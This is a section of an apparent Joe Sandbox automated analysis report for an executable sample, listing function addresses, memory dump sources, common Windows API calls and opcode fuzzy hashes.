                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FreeHeap$BoundaryDeleteDescriptor
                                                                                          • String ID:
                                                                                          • API String ID: 1027024433-0
                                                                                          • Opcode ID: 9ad2bde653e2067dcbacfb2d9943d297b8d4578ba3f0f3648a66c1f71baff1d8
                                                                                          • Instruction ID: daa06cac297216e268689c6bf87d00879d5726c238aad1906ee43e81d2660422
                                                                                          • Opcode Fuzzy Hash: 9ad2bde653e2067dcbacfb2d9943d297b8d4578ba3f0f3648a66c1f71baff1d8
                                                                                          • Instruction Fuzzy Hash: 01014F61908A42C2E765FB66E4443BDE360FF9CB44FC04031CA4E466A0DF3CE48AC364
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768DB9A34 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 171COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: memset
                                                                                          • String ID: 8
                                                                                          • API String ID: 2221118986-4194326291
                                                                                          • Opcode ID: 8ed8ffbed629e1ef5a0c55bbdbe7a4546268f49c3cd19f29d228717bb7474aec
                                                                                          • Instruction ID: f1465a2286f926ab9a098788358a88c777d31317eeb148df6c01756165d5316d
                                                                                          • Opcode Fuzzy Hash: 8ed8ffbed629e1ef5a0c55bbdbe7a4546268f49c3cd19f29d228717bb7474aec
                                                                                          • Instruction Fuzzy Hash: 1B6129A2A18B8591EA05DF2990113A8E361FF98B90F849331DFAD137D5EF3CD186C310
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768C5DB10 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 141memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • HeapFree.KERNEL32(?,?,?,?,?,00000008,?,?,?,?,?,00007FF768C60892), ref: 00007FF768C5DC42
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FreeHeap
                                                                                          • String ID: TOKIO_WORKER_THREADS"" must be valid unicode, error:
                                                                                          • API String ID: 3298025750-1382497495
                                                                                          • Opcode ID: 0b2d3b8e1c6651d9676bfc1cc6c4241ccc9fbd2d45601834f9124af58bef4392
                                                                                          • Instruction ID: d956a4c17d87f5df0bd764c9e6542e468dd85658350a3b19b5f79b3da5196d30
                                                                                          • Opcode Fuzzy Hash: 0b2d3b8e1c6651d9676bfc1cc6c4241ccc9fbd2d45601834f9124af58bef4392
                                                                                          • Instruction Fuzzy Hash: D8517962E04B1185FF25EB61D8142BCE7A0AF44BA8F898631DE1D027D4DFBCA4D5C269
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768C642C0 Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorFileHandleInformationLast
                                                                                          • String ID:
                                                                                          • API String ID: 275135790-0
                                                                                          • Opcode ID: e79d9f41e2d500d49419bf93081910adf22ea2c3ce9b1b6d1adfa4f4aac541c7
                                                                                          • Instruction ID: 852a66fa2f46ad9534bc8ef65612c8d77813ef8829712d39a6e2b4c350f28c92
                                                                                          • Opcode Fuzzy Hash: e79d9f41e2d500d49419bf93081910adf22ea2c3ce9b1b6d1adfa4f4aac541c7
                                                                                          • Instruction Fuzzy Hash: 1521877262868187E3348F56F4417AAF7B0FB88794F509124EBCA43B54DB7CE581CB50
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768C779D0 Relevance: 3.1, APIs: 2, Instructions: 60COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorLastOverlappedResult
                                                                                          • String ID:
                                                                                          • API String ID: 185562886-0
                                                                                          • Opcode ID: d2eedbea1260d70e56f20b7f3ff269c75f95bf81c650e6595cbc467afbd39259
                                                                                          • Instruction ID: b32d5f05ed7a210217ac72d14fe9ac727ac6b41fac7a0e2d100514bdb217866c
                                                                                          • Opcode Fuzzy Hash: d2eedbea1260d70e56f20b7f3ff269c75f95bf81c650e6595cbc467afbd39259
                                                                                          • Instruction Fuzzy Hash: F3118121A0D25AC1FA34AB12D550339EB60FF487E4F9891B1CE4D47B90DF3CE6929768
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768C64E00 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorFileLastPointer
                                                                                          • String ID:
                                                                                          • API String ID: 2976181284-0
                                                                                          • Opcode ID: ea3780a6baa0f531612c26c385d7a8cb1790a000c35b4f7300f01aa89bdcc554
                                                                                          • Instruction ID: ec643b28877f81dc8eb1596ed0d5400ee121392ec6adc19a94ac11ab639bc90a
                                                                                          • Opcode Fuzzy Hash: ea3780a6baa0f531612c26c385d7a8cb1790a000c35b4f7300f01aa89bdcc554
                                                                                          • Instruction Fuzzy Hash: 56F03072A04B42C1EB349B11F440369F3A0AF48790F944031CA9D53760EF3CD1C5C754
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768DB94F5 Relevance: 2.7, APIs: 2, Instructions: 166COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: memcpymemset
                                                                                          • String ID:
                                                                                          • API String ID: 1297977491-0
                                                                                          • Opcode ID: ea2b30322a82c0e8e7f851852dbabdc94ba002645572fc714aa4afc3baf143ef
                                                                                          • Instruction ID: d5924b208fa3cf297aa9a1117a92147668ef99db1d74382eb6d536c305713bd6
                                                                                          • Opcode Fuzzy Hash: ea2b30322a82c0e8e7f851852dbabdc94ba002645572fc714aa4afc3baf143ef
                                                                                          • Instruction Fuzzy Hash: 3B61E952B14B8591EA04DF2991117A8D361FF99BA4F849335DEAE137D4EF3CD186C310
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768B73F1F Relevance: 2.7, APIs: 2, Instructions: 164memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FreeHeap
                                                                                          • String ID:
                                                                                          • API String ID: 3298025750-0
                                                                                          • Opcode ID: cfefc808accadcad1b874f6037806088ad7c18a5b30409d9341cca9cec392168
                                                                                          • Instruction ID: fbda730d0dfef38d6f2f27461be260e7a75ffc51ab880f2c221fbc4dbe69073f
                                                                                          • Opcode Fuzzy Hash: cfefc808accadcad1b874f6037806088ad7c18a5b30409d9341cca9cec392168
                                                                                          • Instruction Fuzzy Hash: 37713476619B80C6E7609B16B44026AFBA0FB89BD4F585026FECD43B69CF3DD091DB04
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768BB5172 Relevance: 2.7, APIs: 2, Instructions: 153COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • memcpy.VCRUNTIME140(00000004,?,?,00000000,?,?,?,00007FF768BD1D39), ref: 00007FF768BB51E8
                                                                                          • memcpy.VCRUNTIME140(00000004,?,?,00000000,?,?,?,00007FF768BD1D39), ref: 00007FF768BB5227
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: memcpy
                                                                                          • String ID:
                                                                                          • API String ID: 3510742995-0
                                                                                          • Opcode ID: c3cfe5e469470455c71c8e8542ef8778ab651c1ac7539d3210e92fb3d1447d58
                                                                                          • Instruction ID: e32aa23e871667d626e49fa2930350fdba1fd0fa75b005af1b4f4b58e6737a56
                                                                                          • Opcode Fuzzy Hash: c3cfe5e469470455c71c8e8542ef8778ab651c1ac7539d3210e92fb3d1447d58
                                                                                          • Instruction Fuzzy Hash: 0C5189A2B09B85C1EA04EB51E4485AEE769EF58BC4B948031DE4E07B94DF7CD446C36C
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768B99957 Relevance: 2.6, APIs: 2, Instructions: 60memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FreeHeap$memcmpmemcpy
                                                                                          • String ID:
                                                                                          • API String ID: 2605475555-0
                                                                                          • Opcode ID: ae5f5d6a3bf9270d0f11d9b995ddd215b18ecf15e112215fca0dd7011c05aa6f
                                                                                          • Instruction ID: 5d685ef99a5205bca4b18a258403bf5f41f4f3f296c47d11357b2ae15ee72fd8
                                                                                          • Opcode Fuzzy Hash: ae5f5d6a3bf9270d0f11d9b995ddd215b18ecf15e112215fca0dd7011c05aa6f
                                                                                          • Instruction Fuzzy Hash: 5D218111A4D682C4EEB4AB11A4543F9D256EF8EB80FC84431D94D077D5DE3CE9048728
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768B99960 Relevance: 2.6, APIs: 2, Instructions: 59memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FreeHeap$memcmpmemcpy
                                                                                          • String ID:
                                                                                          • API String ID: 2605475555-0
                                                                                          • Opcode ID: 1a0be218c78535276df507eb38c32ee0e133ca07e89901886291fd48418304ac
                                                                                          • Instruction ID: f9ee86c335232dac153ef47e1ede98f1343899d434af3a0be98607566c2fce33
                                                                                          • Opcode Fuzzy Hash: 1a0be218c78535276df507eb38c32ee0e133ca07e89901886291fd48418304ac
                                                                                          • Instruction Fuzzy Hash: 6B218111A4D683C4EE70AB11A4543F9D356EF8AB80FC84431D95D077D5DE2CE9058728
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768C66EC0 Relevance: 2.6, APIs: 2, Instructions: 59memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF768C67140: memset.VCRUNTIME140 ref: 00007FF768C67243
                                                                                            • Part of subcall function 00007FF768C67140: FindFirstFileW.KERNEL32 ref: 00007FF768C6724E
                                                                                            • Part of subcall function 00007FF768C67140: FindClose.KERNEL32 ref: 00007FF768C67261
                                                                                            • Part of subcall function 00007FF768C67140: HeapFree.KERNEL32 ref: 00007FF768C67378
                                                                                          • HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF768B92075), ref: 00007FF768C66F40
                                                                                          • HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF768B92075), ref: 00007FF768C66F54
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FreeHeap$Find$CloseFileFirstmemset
                                                                                          • String ID:
                                                                                          • API String ID: 2317575439-0
                                                                                          • Opcode ID: 6de0f529a3a24682735e89e8fefd711e24189bf5b3720ed1cc96e5cfd2953974
                                                                                          • Instruction ID: 1b0cac3f7b70438cc06edf12334522585ec924571de70427fbac0ff2f9334762
                                                                                          • Opcode Fuzzy Hash: 6de0f529a3a24682735e89e8fefd711e24189bf5b3720ed1cc96e5cfd2953974
                                                                                          • Instruction Fuzzy Hash: B1217A72E04A51C5E7109B62D8447ADA771BF88BA8F858276CE2D67794CF38D484C394
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768B99A6B Relevance: 2.6, APIs: 2, Instructions: 54memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FreeHeap
                                                                                          • String ID:
                                                                                          • API String ID: 3298025750-0
                                                                                          • Opcode ID: eaf83155b3c0f705d7572936113bc60b3eb56b885e70bc7767e4d375ad9fc045
                                                                                          • Instruction ID: 7c21a599484c3b301411442c6a813be2f9c01a9b7f2ccab222781b1498720fba
                                                                                          • Opcode Fuzzy Hash: eaf83155b3c0f705d7572936113bc60b3eb56b885e70bc7767e4d375ad9fc045
                                                                                          • Instruction Fuzzy Hash: B3218421A4DA83C5EEB0BB1194503BDD756EF9EB80FC84432D94E07696DF2CEC459328
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768B99B2D Relevance: 2.6, APIs: 2, Instructions: 53memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FreeHeap
                                                                                          • String ID:
                                                                                          • API String ID: 3298025750-0
                                                                                          • Opcode ID: d631984241d23bfb2d12ac78b2fc5f82a7bc774147e8437bbd3a747b091e58c7
                                                                                          • Instruction ID: ed3c8dce86d57692a37e905ba353429912e0ad641d82b06a0d1dbfd1ad342e5d
                                                                                          • Opcode Fuzzy Hash: d631984241d23bfb2d12ac78b2fc5f82a7bc774147e8437bbd3a747b091e58c7
                                                                                          • Instruction Fuzzy Hash: 94216320A4DA86C5EEB0BB1294503B9D756EF9EB80FC44432D94D07A96DF3CE8458328
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768B99B1B Relevance: 2.5, APIs: 2, Instructions: 46memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FreeHeap
                                                                                          • String ID:
                                                                                          • API String ID: 3298025750-0
                                                                                          • Opcode ID: 279f6cff8da7d91aeb85b2b8cfb06a716103f14779ca8871225d3cd194f58a88
                                                                                          • Instruction ID: 5fad22cfc8ef11816428fed811aabbf151fe66fbbae5e81cd4ec7b010a7d3868
                                                                                          • Opcode Fuzzy Hash: 279f6cff8da7d91aeb85b2b8cfb06a716103f14779ca8871225d3cd194f58a88
                                                                                          • Instruction Fuzzy Hash: A1116321A4DA86C5EE70FB11A4503B9E252EF9EB80FC44032D94D07A95DF3CE845C328
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768B99B16 Relevance: 2.5, APIs: 2, Instructions: 45memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FreeHeap
                                                                                          • String ID:
                                                                                          • API String ID: 3298025750-0
                                                                                          • Opcode ID: ae125cfb8e733b80c02b66a5a8b0d35a6718c122da4188c195b5d552f0774859
                                                                                          • Instruction ID: a95793b791e2ef4d1afdbe885d70250c233394cc8d3840741e6d6f97f7cbfda1
                                                                                          • Opcode Fuzzy Hash: ae125cfb8e733b80c02b66a5a8b0d35a6718c122da4188c195b5d552f0774859
                                                                                          • Instruction Fuzzy Hash: E1115121A4DA82C5EE74BB11A4503BDE655EF9EB40FC84031D94D07A95DF2CE845D728
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768B82B71 Relevance: 2.5, APIs: 2, Instructions: 37memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FreeHeap
                                                                                          • String ID:
                                                                                          • API String ID: 3298025750-0
                                                                                          • Opcode ID: b86d319f97766640d0803fcfe6fca8a808b364e61eb8ff703b8b6bada24fec0a
                                                                                          • Instruction ID: 45e5a56cafc71f9eb56a7024b286632261ef5a290837f09dc4294819e48a3fc7
                                                                                          • Opcode Fuzzy Hash: b86d319f97766640d0803fcfe6fca8a808b364e61eb8ff703b8b6bada24fec0a
                                                                                          • Instruction Fuzzy Hash: 47114822C4DBC1C1E2739B18A4493F9A764FFED759F82A261DE8802261DF38D1C6C700
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768C7DF4E Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RtlDeleteBoundaryDescriptor.NTDLL(?,?,0000000F,?,00007FF768C7DF22,?,?,?,00007FF768C7DEE5,?,?,?,00007FF768C7DE3A), ref: 00007FF768C7DF8D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
